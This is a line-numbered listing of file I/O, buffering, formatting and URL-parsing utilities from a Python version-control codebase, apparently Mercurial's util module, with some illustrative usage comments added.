2081 the temporary copy to the original name, making the changes
2069 visible. If the object is destroyed without being closed, all your
2082 visible. If the object is destroyed without being closed, all your
2070 writes are discarded.
2083 writes are discarded.
2071
2084
2072 The checkambig argument of the constructor is used with filestat,
2085 The checkambig argument of the constructor is used with filestat,
2073 and is useful only if the target file is guarded by a lock
2086 and is useful only if the target file is guarded by a lock
2074 (e.g. repo.lock or repo.wlock).
2087 (e.g. repo.lock or repo.wlock).
2075 '''
2088 '''
2076 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2089 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2077 self.__name = name # permanent name
2090 self.__name = name # permanent name
2078 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2091 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2079 createmode=createmode)
2092 createmode=createmode)
2080 self._fp = posixfile(self._tempname, mode)
2093 self._fp = posixfile(self._tempname, mode)
2081 self._checkambig = checkambig
2094 self._checkambig = checkambig
2082
2095
2083 # delegated methods
2096 # delegated methods
2084 self.read = self._fp.read
2097 self.read = self._fp.read
2085 self.write = self._fp.write
2098 self.write = self._fp.write
2086 self.seek = self._fp.seek
2099 self.seek = self._fp.seek
2087 self.tell = self._fp.tell
2100 self.tell = self._fp.tell
2088 self.fileno = self._fp.fileno
2101 self.fileno = self._fp.fileno
2089
2102
2090 def close(self):
2103 def close(self):
2091 if not self._fp.closed:
2104 if not self._fp.closed:
2092 self._fp.close()
2105 self._fp.close()
2093 filename = localpath(self.__name)
2106 filename = localpath(self.__name)
2094 oldstat = self._checkambig and filestat.frompath(filename)
2107 oldstat = self._checkambig and filestat.frompath(filename)
2095 if oldstat and oldstat.stat:
2108 if oldstat and oldstat.stat:
2096 rename(self._tempname, filename)
2109 rename(self._tempname, filename)
2097 newstat = filestat.frompath(filename)
2110 newstat = filestat.frompath(filename)
2098 if newstat.isambig(oldstat):
2111 if newstat.isambig(oldstat):
2099 # stat of changed file is ambiguous to original one
2112 # stat of changed file is ambiguous to original one
2100 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2113 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2101 os.utime(filename, (advanced, advanced))
2114 os.utime(filename, (advanced, advanced))
2102 else:
2115 else:
2103 rename(self._tempname, filename)
2116 rename(self._tempname, filename)
2104
2117
2105 def discard(self):
2118 def discard(self):
2106 if not self._fp.closed:
2119 if not self._fp.closed:
2107 try:
2120 try:
2108 os.unlink(self._tempname)
2121 os.unlink(self._tempname)
2109 except OSError:
2122 except OSError:
2110 pass
2123 pass
2111 self._fp.close()
2124 self._fp.close()
2112
2125
2113 def __del__(self):
2126 def __del__(self):
2114 if safehasattr(self, '_fp'): # constructor actually did something
2127 if safehasattr(self, '_fp'): # constructor actually did something
2115 self.discard()
2128 self.discard()
2116
2129
2117 def __enter__(self):
2130 def __enter__(self):
2118 return self
2131 return self
2119
2132
2120 def __exit__(self, exctype, excvalue, traceback):
2133 def __exit__(self, exctype, excvalue, traceback):
2121 if exctype is not None:
2134 if exctype is not None:
2122 self.discard()
2135 self.discard()
2123 else:
2136 else:
2124 self.close()
2137 self.close()
2125
2138
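# Illustrative sketch (not part of the original module): atomictempfile is
# normally used as a context manager, so readers of 'somefile' (a
# hypothetical name) never observe a half-written file.
#
#     with atomictempfile('somefile') as fp:
#         fp.write(b'all or nothing')
#     # on normal exit the temp file is renamed over 'somefile';
#     # on an exception it is discarded and 'somefile' is untouched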
2126 def unlinkpath(f, ignoremissing=False, rmdir=True):
2139 def unlinkpath(f, ignoremissing=False, rmdir=True):
2127 """unlink and remove the directory if it is empty"""
2140 """unlink and remove the directory if it is empty"""
2128 if ignoremissing:
2141 if ignoremissing:
2129 tryunlink(f)
2142 tryunlink(f)
2130 else:
2143 else:
2131 unlink(f)
2144 unlink(f)
2132 if rmdir:
2145 if rmdir:
2133 # try removing directories that might now be empty
2146 # try removing directories that might now be empty
2134 try:
2147 try:
2135 removedirs(os.path.dirname(f))
2148 removedirs(os.path.dirname(f))
2136 except OSError:
2149 except OSError:
2137 pass
2150 pass
2138
2151
2139 def tryunlink(f):
2152 def tryunlink(f):
2140 """Attempt to remove a file, ignoring ENOENT errors."""
2153 """Attempt to remove a file, ignoring ENOENT errors."""
2141 try:
2154 try:
2142 unlink(f)
2155 unlink(f)
2143 except OSError as e:
2156 except OSError as e:
2144 if e.errno != errno.ENOENT:
2157 if e.errno != errno.ENOENT:
2145 raise
2158 raise
2146
2159
2147 def makedirs(name, mode=None, notindexed=False):
2160 def makedirs(name, mode=None, notindexed=False):
2148 """recursive directory creation with parent mode inheritance
2161 """recursive directory creation with parent mode inheritance
2149
2162
2150 Newly created directories are marked as "not to be indexed by
2163 Newly created directories are marked as "not to be indexed by
2151 the content indexing service", if ``notindexed`` is specified
2164 the content indexing service", if ``notindexed`` is specified
2152 for "write" mode access.
2165 for "write" mode access.
2153 """
2166 """
2154 try:
2167 try:
2155 makedir(name, notindexed)
2168 makedir(name, notindexed)
2156 except OSError as err:
2169 except OSError as err:
2157 if err.errno == errno.EEXIST:
2170 if err.errno == errno.EEXIST:
2158 return
2171 return
2159 if err.errno != errno.ENOENT or not name:
2172 if err.errno != errno.ENOENT or not name:
2160 raise
2173 raise
2161 parent = os.path.dirname(os.path.abspath(name))
2174 parent = os.path.dirname(os.path.abspath(name))
2162 if parent == name:
2175 if parent == name:
2163 raise
2176 raise
2164 makedirs(parent, mode, notindexed)
2177 makedirs(parent, mode, notindexed)
2165 try:
2178 try:
2166 makedir(name, notindexed)
2179 makedir(name, notindexed)
2167 except OSError as err:
2180 except OSError as err:
2168 # Catch EEXIST to handle races
2181 # Catch EEXIST to handle races
2169 if err.errno == errno.EEXIST:
2182 if err.errno == errno.EEXIST:
2170 return
2183 return
2171 raise
2184 raise
2172 if mode is not None:
2185 if mode is not None:
2173 os.chmod(name, mode)
2186 os.chmod(name, mode)
2174
2187
2175 def readfile(path):
2188 def readfile(path):
2176 with open(path, 'rb') as fp:
2189 with open(path, 'rb') as fp:
2177 return fp.read()
2190 return fp.read()
2178
2191
2179 def writefile(path, text):
2192 def writefile(path, text):
2180 with open(path, 'wb') as fp:
2193 with open(path, 'wb') as fp:
2181 fp.write(text)
2194 fp.write(text)
2182
2195
2183 def appendfile(path, text):
2196 def appendfile(path, text):
2184 with open(path, 'ab') as fp:
2197 with open(path, 'ab') as fp:
2185 fp.write(text)
2198 fp.write(text)
2186
2199
2187 class chunkbuffer(object):
2200 class chunkbuffer(object):
2188 """Allow arbitrary sized chunks of data to be efficiently read from an
2201 """Allow arbitrary sized chunks of data to be efficiently read from an
2189 iterator over chunks of arbitrary size."""
2202 iterator over chunks of arbitrary size."""
2190
2203
2191 def __init__(self, in_iter):
2204 def __init__(self, in_iter):
2192 """in_iter is the iterator that's iterating over the input chunks."""
2205 """in_iter is the iterator that's iterating over the input chunks."""
2193 def splitbig(chunks):
2206 def splitbig(chunks):
2194 for chunk in chunks:
2207 for chunk in chunks:
2195 if len(chunk) > 2**20:
2208 if len(chunk) > 2**20:
2196 pos = 0
2209 pos = 0
2197 while pos < len(chunk):
2210 while pos < len(chunk):
2198 end = pos + 2 ** 18
2211 end = pos + 2 ** 18
2199 yield chunk[pos:end]
2212 yield chunk[pos:end]
2200 pos = end
2213 pos = end
2201 else:
2214 else:
2202 yield chunk
2215 yield chunk
2203 self.iter = splitbig(in_iter)
2216 self.iter = splitbig(in_iter)
2204 self._queue = collections.deque()
2217 self._queue = collections.deque()
2205 self._chunkoffset = 0
2218 self._chunkoffset = 0
2206
2219
2207 def read(self, l=None):
2220 def read(self, l=None):
2208 """Read L bytes of data from the iterator of chunks of data.
2221 """Read L bytes of data from the iterator of chunks of data.
2209 Returns less than L bytes if the iterator runs dry.
2222 Returns less than L bytes if the iterator runs dry.
2210
2223
2211 If the size parameter is omitted, read everything."""
2224 If the size parameter is omitted, read everything."""
2212 if l is None:
2225 if l is None:
2213 return ''.join(self.iter)
2226 return ''.join(self.iter)
2214
2227
2215 left = l
2228 left = l
2216 buf = []
2229 buf = []
2217 queue = self._queue
2230 queue = self._queue
2218 while left > 0:
2231 while left > 0:
2219 # refill the queue
2232 # refill the queue
2220 if not queue:
2233 if not queue:
2221 target = 2**18
2234 target = 2**18
2222 for chunk in self.iter:
2235 for chunk in self.iter:
2223 queue.append(chunk)
2236 queue.append(chunk)
2224 target -= len(chunk)
2237 target -= len(chunk)
2225 if target <= 0:
2238 if target <= 0:
2226 break
2239 break
2227 if not queue:
2240 if not queue:
2228 break
2241 break
2229
2242
2230 # The easy way to do this would be to queue.popleft(), modify the
2243 # The easy way to do this would be to queue.popleft(), modify the
2231 # chunk (if necessary), then queue.appendleft(). However, for cases
2244 # chunk (if necessary), then queue.appendleft(). However, for cases
2232 # where we read partial chunk content, this incurs 2 dequeue
2245 # where we read partial chunk content, this incurs 2 dequeue
2233 # mutations and creates a new str for the remaining chunk in the
2246 # mutations and creates a new str for the remaining chunk in the
2234 # queue. Our code below avoids this overhead.
2247 # queue. Our code below avoids this overhead.
2235
2248
2236 chunk = queue[0]
2249 chunk = queue[0]
2237 chunkl = len(chunk)
2250 chunkl = len(chunk)
2238 offset = self._chunkoffset
2251 offset = self._chunkoffset
2239
2252
2240 # Use full chunk.
2253 # Use full chunk.
2241 if offset == 0 and left >= chunkl:
2254 if offset == 0 and left >= chunkl:
2242 left -= chunkl
2255 left -= chunkl
2243 queue.popleft()
2256 queue.popleft()
2244 buf.append(chunk)
2257 buf.append(chunk)
2245 # self._chunkoffset remains at 0.
2258 # self._chunkoffset remains at 0.
2246 continue
2259 continue
2247
2260
2248 chunkremaining = chunkl - offset
2261 chunkremaining = chunkl - offset
2249
2262
2250 # Use all of unconsumed part of chunk.
2263 # Use all of unconsumed part of chunk.
2251 if left >= chunkremaining:
2264 if left >= chunkremaining:
2252 left -= chunkremaining
2265 left -= chunkremaining
2253 queue.popleft()
2266 queue.popleft()
2254 # offset == 0 is enabled by block above, so this won't merely
2267 # offset == 0 is enabled by block above, so this won't merely
2255 # copy via ``chunk[0:]``.
2268 # copy via ``chunk[0:]``.
2256 buf.append(chunk[offset:])
2269 buf.append(chunk[offset:])
2257 self._chunkoffset = 0
2270 self._chunkoffset = 0
2258
2271
2259 # Partial chunk needed.
2272 # Partial chunk needed.
2260 else:
2273 else:
2261 buf.append(chunk[offset:offset + left])
2274 buf.append(chunk[offset:offset + left])
2262 self._chunkoffset += left
2275 self._chunkoffset += left
2263 left -= chunkremaining
2276 left -= chunkremaining
2264
2277
2265 return ''.join(buf)
2278 return ''.join(buf)
2266
2279
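# Illustrative sketch (not part of the original module): chunkbuffer turns
# an iterator of unevenly sized chunks into a file-like reader. Doctest
# style assumes Python 2-era bytes semantics, like the module itself.
#
#     >>> buf = chunkbuffer(iter([b'abc', b'de', b'f']))
#     >>> buf.read(4)
#     'abcd'
#     >>> buf.read(2)
#     'ef'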
2267 def filechunkiter(f, size=131072, limit=None):
2280 def filechunkiter(f, size=131072, limit=None):
2268 """Create a generator that produces the data in the file size
2281 """Create a generator that produces the data in the file size
2269 (default 131072) bytes at a time, up to optional limit (default is
2282 (default 131072) bytes at a time, up to optional limit (default is
2270 to read all data). Chunks may be less than size bytes if the
2283 to read all data). Chunks may be less than size bytes if the
2271 chunk is the last chunk in the file, or the file is a socket or
2284 chunk is the last chunk in the file, or the file is a socket or
2272 some other type of file that sometimes reads less data than is
2285 some other type of file that sometimes reads less data than is
2273 requested."""
2286 requested."""
2274 assert size >= 0
2287 assert size >= 0
2275 assert limit is None or limit >= 0
2288 assert limit is None or limit >= 0
2276 while True:
2289 while True:
2277 if limit is None:
2290 if limit is None:
2278 nbytes = size
2291 nbytes = size
2279 else:
2292 else:
2280 nbytes = min(limit, size)
2293 nbytes = min(limit, size)
2281 s = nbytes and f.read(nbytes)
2294 s = nbytes and f.read(nbytes)
2282 if not s:
2295 if not s:
2283 break
2296 break
2284 if limit:
2297 if limit:
2285 limit -= len(s)
2298 limit -= len(s)
2286 yield s
2299 yield s
2287
2300
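# Illustrative sketch (not part of the original module): reading a file in
# bounded chunks, stopping after at most 1 MB. 'somefile' and process()
# are hypothetical.
#
#     fp = open('somefile', 'rb')
#     for chunk in filechunkiter(fp, size=65536, limit=2 ** 20):
#         process(chunk)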
2288 class cappedreader(object):
2301 class cappedreader(object):
2289 """A file object proxy that allows reading up to N bytes.
2302 """A file object proxy that allows reading up to N bytes.
2290
2303
2291 Given a source file object, instances of this type allow reading up to
2304 Given a source file object, instances of this type allow reading up to
2292 N bytes from that source file object. Attempts to read past the allowed
2305 N bytes from that source file object. Attempts to read past the allowed
2293 limit are treated as EOF.
2306 limit are treated as EOF.
2294
2307
2295 It is assumed that I/O is not performed on the original file object
2308 It is assumed that I/O is not performed on the original file object
2296 in addition to the I/O performed by this instance. If it is,
2309 in addition to the I/O performed by this instance. If it is,
2297 state tracking will get out of sync and unexpected results will ensue.
2310 state tracking will get out of sync and unexpected results will ensue.
2298 """
2311 """
2299 def __init__(self, fh, limit):
2312 def __init__(self, fh, limit):
2300 """Allow reading up to <limit> bytes from <fh>."""
2313 """Allow reading up to <limit> bytes from <fh>."""
2301 self._fh = fh
2314 self._fh = fh
2302 self._left = limit
2315 self._left = limit
2303
2316
2304 def read(self, n=-1):
2317 def read(self, n=-1):
2305 if not self._left:
2318 if not self._left:
2306 return b''
2319 return b''
2307
2320
2308 if n < 0:
2321 if n < 0:
2309 n = self._left
2322 n = self._left
2310
2323
2311 data = self._fh.read(min(n, self._left))
2324 data = self._fh.read(min(n, self._left))
2312 self._left -= len(data)
2325 self._left -= len(data)
2313 assert self._left >= 0
2326 assert self._left >= 0
2314
2327
2315 return data
2328 return data
2316
2329
2317 def readinto(self, b):
2330 def readinto(self, b):
2318 res = self.read(len(b))
2331 res = self.read(len(b))
2319 if res is None:
2332 if res is None:
2320 return None
2333 return None
2321
2334
2322 b[0:len(res)] = res
2335 b[0:len(res)] = res
2323 return len(res)
2336 return len(res)
2324
2337
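# Illustrative sketch (not part of the original module): cappedreader makes
# it safe to hand a length-prefixed region of a stream to code that would
# otherwise read past it.
#
#     >>> import io
#     >>> fh = io.BytesIO(b'0123456789')
#     >>> r = cappedreader(fh, 4)
#     >>> r.read()
#     '0123'
#     >>> r.read(1)
#     ''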
2325 def unitcountfn(*unittable):
2338 def unitcountfn(*unittable):
2326 '''return a function that renders a readable count of some quantity'''
2339 '''return a function that renders a readable count of some quantity'''
2327
2340
2328 def go(count):
2341 def go(count):
2329 for multiplier, divisor, format in unittable:
2342 for multiplier, divisor, format in unittable:
2330 if abs(count) >= divisor * multiplier:
2343 if abs(count) >= divisor * multiplier:
2331 return format % (count / float(divisor))
2344 return format % (count / float(divisor))
2332 return unittable[-1][2] % count
2345 return unittable[-1][2] % count
2333
2346
2334 return go
2347 return go
2335
2348
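# Illustrative sketch (not part of the original module): unitcountfn builds
# formatters like the bytecount and timecount tables below. A custom
# two-unit counter (plain format strings here, instead of _()-wrapped ones):
#
#     >>> fmt = unitcountfn((1, 1000, '%.1f k'), (1, 1, '%d'))
#     >>> fmt(1500)
#     '1.5 k'
#     >>> fmt(42)
#     '42'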
2336 def processlinerange(fromline, toline):
2349 def processlinerange(fromline, toline):
2337 """Check that linerange <fromline>:<toline> makes sense and return a
2350 """Check that linerange <fromline>:<toline> makes sense and return a
2338 0-based range.
2351 0-based range.
2339
2352
2340 >>> processlinerange(10, 20)
2353 >>> processlinerange(10, 20)
2341 (9, 20)
2354 (9, 20)
2342 >>> processlinerange(2, 1)
2355 >>> processlinerange(2, 1)
2343 Traceback (most recent call last):
2356 Traceback (most recent call last):
2344 ...
2357 ...
2345 ParseError: line range must be positive
2358 ParseError: line range must be positive
2346 >>> processlinerange(0, 5)
2359 >>> processlinerange(0, 5)
2347 Traceback (most recent call last):
2360 Traceback (most recent call last):
2348 ...
2361 ...
2349 ParseError: fromline must be strictly positive
2362 ParseError: fromline must be strictly positive
2350 """
2363 """
2351 if toline - fromline < 0:
2364 if toline - fromline < 0:
2352 raise error.ParseError(_("line range must be positive"))
2365 raise error.ParseError(_("line range must be positive"))
2353 if fromline < 1:
2366 if fromline < 1:
2354 raise error.ParseError(_("fromline must be strictly positive"))
2367 raise error.ParseError(_("fromline must be strictly positive"))
2355 return fromline - 1, toline
2368 return fromline - 1, toline
2356
2369
2357 bytecount = unitcountfn(
2370 bytecount = unitcountfn(
2358 (100, 1 << 30, _('%.0f GB')),
2371 (100, 1 << 30, _('%.0f GB')),
2359 (10, 1 << 30, _('%.1f GB')),
2372 (10, 1 << 30, _('%.1f GB')),
2360 (1, 1 << 30, _('%.2f GB')),
2373 (1, 1 << 30, _('%.2f GB')),
2361 (100, 1 << 20, _('%.0f MB')),
2374 (100, 1 << 20, _('%.0f MB')),
2362 (10, 1 << 20, _('%.1f MB')),
2375 (10, 1 << 20, _('%.1f MB')),
2363 (1, 1 << 20, _('%.2f MB')),
2376 (1, 1 << 20, _('%.2f MB')),
2364 (100, 1 << 10, _('%.0f KB')),
2377 (100, 1 << 10, _('%.0f KB')),
2365 (10, 1 << 10, _('%.1f KB')),
2378 (10, 1 << 10, _('%.1f KB')),
2366 (1, 1 << 10, _('%.2f KB')),
2379 (1, 1 << 10, _('%.2f KB')),
2367 (1, 1, _('%.0f bytes')),
2380 (1, 1, _('%.0f bytes')),
2368 )
2381 )
2369
2382
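# Illustrative sketch (not part of the original module): sample outputs of
# the bytecount formatter defined above.
#
#     >>> bytecount(1 << 20)
#     '1.00 MB'
#     >>> bytecount(123)
#     '123 bytes'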
2370 class transformingwriter(object):
2383 class transformingwriter(object):
2371 """Writable file wrapper to transform data by function"""
2384 """Writable file wrapper to transform data by function"""
2372
2385
2373 def __init__(self, fp, encode):
2386 def __init__(self, fp, encode):
2374 self._fp = fp
2387 self._fp = fp
2375 self._encode = encode
2388 self._encode = encode
2376
2389
2377 def close(self):
2390 def close(self):
2378 self._fp.close()
2391 self._fp.close()
2379
2392
2380 def flush(self):
2393 def flush(self):
2381 self._fp.flush()
2394 self._fp.flush()
2382
2395
2383 def write(self, data):
2396 def write(self, data):
2384 return self._fp.write(self._encode(data))
2397 return self._fp.write(self._encode(data))
2385
2398
2386 # Matches a single EOL, which can be either a CRLF (where repeated CRs
2399 # Matches a single EOL, which can be either a CRLF (where repeated CRs
2387 # are removed) or a LF. We do not care about old Macintosh files, so a
2400 # are removed) or a LF. We do not care about old Macintosh files, so a
2388 # stray CR is an error.
2401 # stray CR is an error.
2389 _eolre = remod.compile(br'\r*\n')
2402 _eolre = remod.compile(br'\r*\n')
2390
2403
2391 def tolf(s):
2404 def tolf(s):
2392 return _eolre.sub('\n', s)
2405 return _eolre.sub('\n', s)
2393
2406
2394 def tocrlf(s):
2407 def tocrlf(s):
2395 return _eolre.sub('\r\n', s)
2408 return _eolre.sub('\r\n', s)
2396
2409
2397 def _crlfwriter(fp):
2410 def _crlfwriter(fp):
2398 return transformingwriter(fp, tocrlf)
2411 return transformingwriter(fp, tocrlf)
2399
2412
2400 if pycompat.oslinesep == '\r\n':
2413 if pycompat.oslinesep == '\r\n':
2401 tonativeeol = tocrlf
2414 tonativeeol = tocrlf
2402 fromnativeeol = tolf
2415 fromnativeeol = tolf
2403 nativeeolwriter = _crlfwriter
2416 nativeeolwriter = _crlfwriter
2404 else:
2417 else:
2405 tonativeeol = pycompat.identity
2418 tonativeeol = pycompat.identity
2406 fromnativeeol = pycompat.identity
2419 fromnativeeol = pycompat.identity
2407 nativeeolwriter = pycompat.identity
2420 nativeeolwriter = pycompat.identity
2408
2421
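# Illustrative sketch (not part of the original module): the EOL helpers
# above normalize line endings in both directions.
#
#     >>> tolf(b'a\r\nb\n')
#     'a\nb\n'
#     >>> tocrlf(b'a\nb\r\n')
#     'a\r\nb\r\n'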
2409 if (pyplatform.python_implementation() == 'CPython' and
2422 if (pyplatform.python_implementation() == 'CPython' and
2410 sys.version_info < (3, 0)):
2423 sys.version_info < (3, 0)):
2411 # There is an issue in CPython that some IO methods do not handle EINTR
2424 # There is an issue in CPython that some IO methods do not handle EINTR
2412 # correctly. The following table shows what CPython version (and functions)
2425 # correctly. The following table shows what CPython version (and functions)
2413 # are affected (buggy: has the EINTR bug, okay: otherwise):
2426 # are affected (buggy: has the EINTR bug, okay: otherwise):
2414 #
2427 #
2415 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2428 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2416 # --------------------------------------------------
2429 # --------------------------------------------------
2417 # fp.__iter__ | buggy | buggy | okay
2430 # fp.__iter__ | buggy | buggy | okay
2418 # fp.read* | buggy | okay [1] | okay
2431 # fp.read* | buggy | okay [1] | okay
2419 #
2432 #
2420 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2433 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2421 #
2434 #
2422 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2435 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2423 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2436 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2424 #
2437 #
2425 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2438 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2426 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2439 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2427 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2440 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2428 # fp.__iter__ but not other fp.read* methods.
2441 # fp.__iter__ but not other fp.read* methods.
2429 #
2442 #
2430 # On modern systems like Linux, the "read" syscall cannot be interrupted
2443 # On modern systems like Linux, the "read" syscall cannot be interrupted
2431 # when reading "fast" files like on-disk files. So the EINTR issue only
2444 # when reading "fast" files like on-disk files. So the EINTR issue only
2432 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2445 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2433 # files approximately as "fast" files and use the fast (unsafe) code path,
2446 # files approximately as "fast" files and use the fast (unsafe) code path,
2434 # to minimize the performance impact.
2447 # to minimize the performance impact.
2435 if sys.version_info >= (2, 7, 4):
2448 if sys.version_info >= (2, 7, 4):
2436 # fp.readline deals with EINTR correctly, use it as a workaround.
2449 # fp.readline deals with EINTR correctly, use it as a workaround.
2437 def _safeiterfile(fp):
2450 def _safeiterfile(fp):
2438 return iter(fp.readline, '')
2451 return iter(fp.readline, '')
2439 else:
2452 else:
2440 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2453 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2441 # note: this may block longer than necessary because of bufsize.
2454 # note: this may block longer than necessary because of bufsize.
2442 def _safeiterfile(fp, bufsize=4096):
2455 def _safeiterfile(fp, bufsize=4096):
2443 fd = fp.fileno()
2456 fd = fp.fileno()
2444 line = ''
2457 line = ''
2445 while True:
2458 while True:
2446 try:
2459 try:
2447 buf = os.read(fd, bufsize)
2460 buf = os.read(fd, bufsize)
2448 except OSError as ex:
2461 except OSError as ex:
2449 # os.read only raises EINTR before any data is read
2462 # os.read only raises EINTR before any data is read
2450 if ex.errno == errno.EINTR:
2463 if ex.errno == errno.EINTR:
2451 continue
2464 continue
2452 else:
2465 else:
2453 raise
2466 raise
2454 line += buf
2467 line += buf
2455 if '\n' in buf:
2468 if '\n' in buf:
2456 splitted = line.splitlines(True)
2469 splitted = line.splitlines(True)
2457 line = ''
2470 line = ''
2458 for l in splitted:
2471 for l in splitted:
2459 if l[-1] == '\n':
2472 if l[-1] == '\n':
2460 yield l
2473 yield l
2461 else:
2474 else:
2462 line = l
2475 line = l
2463 if not buf:
2476 if not buf:
2464 break
2477 break
2465 if line:
2478 if line:
2466 yield line
2479 yield line
2467
2480
2468 def iterfile(fp):
2481 def iterfile(fp):
2469 fastpath = True
2482 fastpath = True
2470 if type(fp) is file:
2483 if type(fp) is file:
2471 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2484 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2472 if fastpath:
2485 if fastpath:
2473 return fp
2486 return fp
2474 else:
2487 else:
2475 return _safeiterfile(fp)
2488 return _safeiterfile(fp)
2476 else:
2489 else:
2477 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2490 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2478 def iterfile(fp):
2491 def iterfile(fp):
2479 return fp
2492 return fp
2480
2493
2481 def iterlines(iterator):
2494 def iterlines(iterator):
2482 for chunk in iterator:
2495 for chunk in iterator:
2483 for line in chunk.splitlines():
2496 for line in chunk.splitlines():
2484 yield line
2497 yield line
2485
2498
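# Illustrative sketch (not part of the original module): iterlines
# re-chunks an iterator of blobs into individual lines.
#
#     >>> list(iterlines([b'a\nb', b'c\n']))
#     ['a', 'b', 'c']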
2486 def expandpath(path):
2499 def expandpath(path):
2487 return os.path.expanduser(os.path.expandvars(path))
2500 return os.path.expanduser(os.path.expandvars(path))
2488
2501
2489 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2502 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2490 """Return the result of interpolating items in the mapping into string s.
2503 """Return the result of interpolating items in the mapping into string s.
2491
2504
2492 prefix is a single character string, or a two character string with
2505 prefix is a single character string, or a two character string with
2493 a backslash as the first character if the prefix needs to be escaped in
2506 a backslash as the first character if the prefix needs to be escaped in
2494 a regular expression.
2507 a regular expression.
2495
2508
2496 fn is an optional function that will be applied to the replacement text
2509 fn is an optional function that will be applied to the replacement text
2497 just before replacement.
2510 just before replacement.
2498
2511
2499 escape_prefix is an optional flag that allows a doubled prefix to be
2512 escape_prefix is an optional flag that allows a doubled prefix to be
2500 used as an escape for the prefix itself.
2513 used as an escape for the prefix itself.
2501 """
2514 """
2502 fn = fn or (lambda s: s)
2515 fn = fn or (lambda s: s)
2503 patterns = '|'.join(mapping.keys())
2516 patterns = '|'.join(mapping.keys())
2504 if escape_prefix:
2517 if escape_prefix:
2505 patterns += '|' + prefix
2518 patterns += '|' + prefix
2506 if len(prefix) > 1:
2519 if len(prefix) > 1:
2507 prefix_char = prefix[1:]
2520 prefix_char = prefix[1:]
2508 else:
2521 else:
2509 prefix_char = prefix
2522 prefix_char = prefix
2510 mapping[prefix_char] = prefix_char
2523 mapping[prefix_char] = prefix_char
2511 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2524 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2512 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2525 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2513
2526
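# Illustrative sketch (not part of the original module): interpolate
# substitutes mapping values for prefixed keys.
#
#     >>> interpolate(b'%', {b'user': b'alice'}, b'hi %user')
#     'hi alice'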
2514 def getport(port):
2527 def getport(port):
2515 """Return the port for a given network service.
2528 """Return the port for a given network service.
2516
2529
2517 If port is an integer, it's returned as is. If it's a string, it's
2530 If port is an integer, it's returned as is. If it's a string, it's
2518 looked up using socket.getservbyname(). If there's no matching
2531 looked up using socket.getservbyname(). If there's no matching
2519 service, error.Abort is raised.
2532 service, error.Abort is raised.
2520 """
2533 """
2521 try:
2534 try:
2522 return int(port)
2535 return int(port)
2523 except ValueError:
2536 except ValueError:
2524 pass
2537 pass
2525
2538
2526 try:
2539 try:
2527 return socket.getservbyname(pycompat.sysstr(port))
2540 return socket.getservbyname(pycompat.sysstr(port))
2528 except socket.error:
2541 except socket.error:
2529 raise error.Abort(_("no port number associated with service '%s'")
2542 raise error.Abort(_("no port number associated with service '%s'")
2530 % port)
2543 % port)
2531
2544
2532 class url(object):
2545 class url(object):
2533 r"""Reliable URL parser.
2546 r"""Reliable URL parser.
2534
2547
2535 This parses URLs and provides attributes for the following
2548 This parses URLs and provides attributes for the following
2536 components:
2549 components:
2537
2550
2538 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2551 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2539
2552
2540 Missing components are set to None. The only exception is
2553 Missing components are set to None. The only exception is
2541 fragment, which is set to '' if present but empty.
2554 fragment, which is set to '' if present but empty.
2542
2555
2543 If parsefragment is False, fragment is included in query. If
2556 If parsefragment is False, fragment is included in query. If
2544 parsequery is False, query is included in path. If both are
2557 parsequery is False, query is included in path. If both are
2545 False, both fragment and query are included in path.
2558 False, both fragment and query are included in path.
2546
2559
2547 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2560 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2548
2561
2549 Note that for backward compatibility reasons, bundle URLs do not
2562 Note that for backward compatibility reasons, bundle URLs do not
2550 take host names. That means 'bundle://../' has a path of '../'.
2563 take host names. That means 'bundle://../' has a path of '../'.
2551
2564
2552 Examples:
2565 Examples:
2553
2566
2554 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2567 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2555 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2568 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2556 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2569 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2557 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2570 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2558 >>> url(b'file:///home/joe/repo')
2571 >>> url(b'file:///home/joe/repo')
2559 <url scheme: 'file', path: '/home/joe/repo'>
2572 <url scheme: 'file', path: '/home/joe/repo'>
